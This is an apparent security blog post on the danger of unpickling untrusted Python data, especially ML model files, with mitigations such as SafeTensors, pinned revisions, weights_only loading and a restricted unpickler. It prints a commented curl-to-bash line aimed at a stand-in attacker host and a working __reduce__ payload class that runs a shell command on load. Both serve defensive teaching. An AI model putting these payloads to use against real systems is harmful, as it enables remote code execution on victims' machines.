Python's pickle module is convenient. It can serialize almost any Python object. But that convenience comes with a critical security cost: deserializing untrusted pickle data is equivalent to arbitrary code execution.
Why Pickle Is Dangerous
When you call `pickle.loads(data)`, Python executes the instructions embedded in the pickle stream. An attacker who controls the pickle data can execute arbitrary Python code on your machine. This isn't a theoretical risk — it's a well-documented, actively exploited vulnerability class.
```python
# This looks innocent
model = pickle.loads(downloaded_data)

# But the attacker's pickle stream can do this:
# os.system("curl attacker.com/shell.sh | bash")
```
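The mechanism is the pickle protocol's `__reduce__` hook: an object can tell pickle to call any function, with any arguments, at load time. A minimal (deliberately harmless) sketch of how such a payload is built:

```python
import os
import pickle

class Malicious:
    # __reduce__ dictates what happens when this object is unpickled:
    # here, "call os.system with this shell command".
    def __reduce__(self):
        return (os.system, ("echo pwned",))

payload = pickle.dumps(Malicious())
# pickle.loads(payload) runs the shell command the moment it is called --
# no method on the object ever needs to be invoked explicitly.
```

Note that the payload is plain bytes: nothing about it looks executable until `pickle.loads()` interprets it.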
The ML Pipeline Problem
The AI/ML ecosystem has a particular problem with pickle. Model files (`.pkl`, `.pt`, `.bin`) are frequently:
- Downloaded from public registries without verification
- Loaded with `pickle.loads()` or `torch.load()` by default
- Shared between teams via model registries and artifact stores
- Executed in production with elevated permissions
When we scanned major ML frameworks, we found pickle deserialization vectors in nearly every one:
- Unpinned `from_pretrained()` calls that download and deserialize models from public registries
- Direct `torch.load()` usage without `weights_only=True`
- `shelve` and `dill` usage on untrusted data paths
Mitigation Strategies
Use SafeTensors. The `safetensors` format stores only tensor data, not arbitrary Python objects. For checkpoints that are plain tensor state dicts — which covers most model weights — it is a near drop-in replacement for pickle-based formats.
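The safety is structural: a safetensors file is a JSON header describing tensor names and sizes, followed by raw byte buffers, so parsing it can never execute code. Here is a toy stdlib sketch of that idea — not the real format, and `save_tensors`/`load_tensors` are illustrative names:

```python
import json
import struct

def save_tensors(path, tensors):
    """Toy tensor-only format: 8-byte header length, JSON header,
    then raw little-endian float32 data. `tensors` maps names to
    flat lists of floats."""
    header = {name: len(vals) for name, vals in tensors.items()}
    header_bytes = json.dumps(header).encode()
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(header_bytes)))
        f.write(header_bytes)
        for vals in tensors.values():
            f.write(struct.pack(f"<{len(vals)}f", *vals))

def load_tensors(path):
    """Parsing only reads declared byte counts -- nothing is executed."""
    with open(path, "rb") as f:
        (hlen,) = struct.unpack("<Q", f.read(8))
        header = json.loads(f.read(hlen))
        return {name: list(struct.unpack(f"<{n}f", f.read(4 * n)))
                for name, n in header.items()}
```

Contrast this with pickle, where the file contains instructions to execute rather than data to describe.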
Pin model revisions. When downloading from model registries, always specify an exact commit hash. This prevents supply-chain attacks where a compromised model replaces the latest version.
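One cheap way to enforce this in a loading pipeline is to reject any revision that is not a full commit hash before downloading. A hedged sketch — `require_pinned` is a hypothetical helper, not any registry's API:

```python
import re

# A full 40-character hex git commit SHA -- immutable, unlike tags or branches.
COMMIT_RE = re.compile(r"^[0-9a-f]{40}$")

def require_pinned(revision):
    """Reject mutable refs like 'main' or 'v1.2'; allow only exact commits."""
    if not COMMIT_RE.match(revision):
        raise ValueError(
            f"unpinned revision {revision!r}: specify a full commit hash"
        )
    return revision
```

Calling this as a gate before any download turns "someone force-pushed a compromised model over the tag" into a non-event.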
Use weights_only=True. PyTorch supports `torch.load(path, weights_only=True)` (available since 1.13, and the default in 2.6+), which restricts unpickling to an allowlist of tensor-related types instead of executing arbitrary pickle instructions.
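The same allowlist idea is available in the stdlib for non-PyTorch code: subclass `pickle.Unpickler` and override `find_class` to reject every global lookup outside a safelist. This is the pattern from the standard pickle documentation, shown here as a sketch rather than PyTorch's actual implementation:

```python
import io
import pickle

# (module, name) pairs the unpickler is allowed to resolve.
SAFE_GLOBALS = {("builtins", "list"), ("builtins", "dict"), ("builtins", "set")}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream references a global (class or function).
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")

def restricted_loads(data):
    """Like pickle.loads, but any global outside the allowlist fails."""
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain containers round-trip fine, while a stream referencing `os.system` (or any other callable) fails at the lookup, before anything runs.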
Validate before loading. Implement checksum verification and signature checking for any model file before deserialization.
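Checksum gating can be a few lines of `hashlib` — a minimal sketch, assuming the expected digest comes from a trusted manifest; `verify_checksum` is an illustrative name:

```python
import hashlib

def verify_checksum(path, expected_sha256):
    """Hash the file in chunks and refuse to proceed on mismatch."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            h.update(chunk)
    if h.hexdigest() != expected_sha256:
        raise ValueError("checksum mismatch -- refusing to deserialize")
```

The key discipline is ordering: verify first, deserialize second. A checksum computed after loading proves nothing.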
The Broader Lesson
Pickle deserialization is just one example of a vulnerability class that traditional static analysis tools struggle with. Bandit will flag `pickle.loads()` — but it won't tell you that the data came from an untrusted network source three function calls earlier, or that your model loading pipeline downloads from an unpinned public registry.
Understanding the full data flow — from untrusted input to dangerous operation — is what separates surface-level scanning from deep code analysis.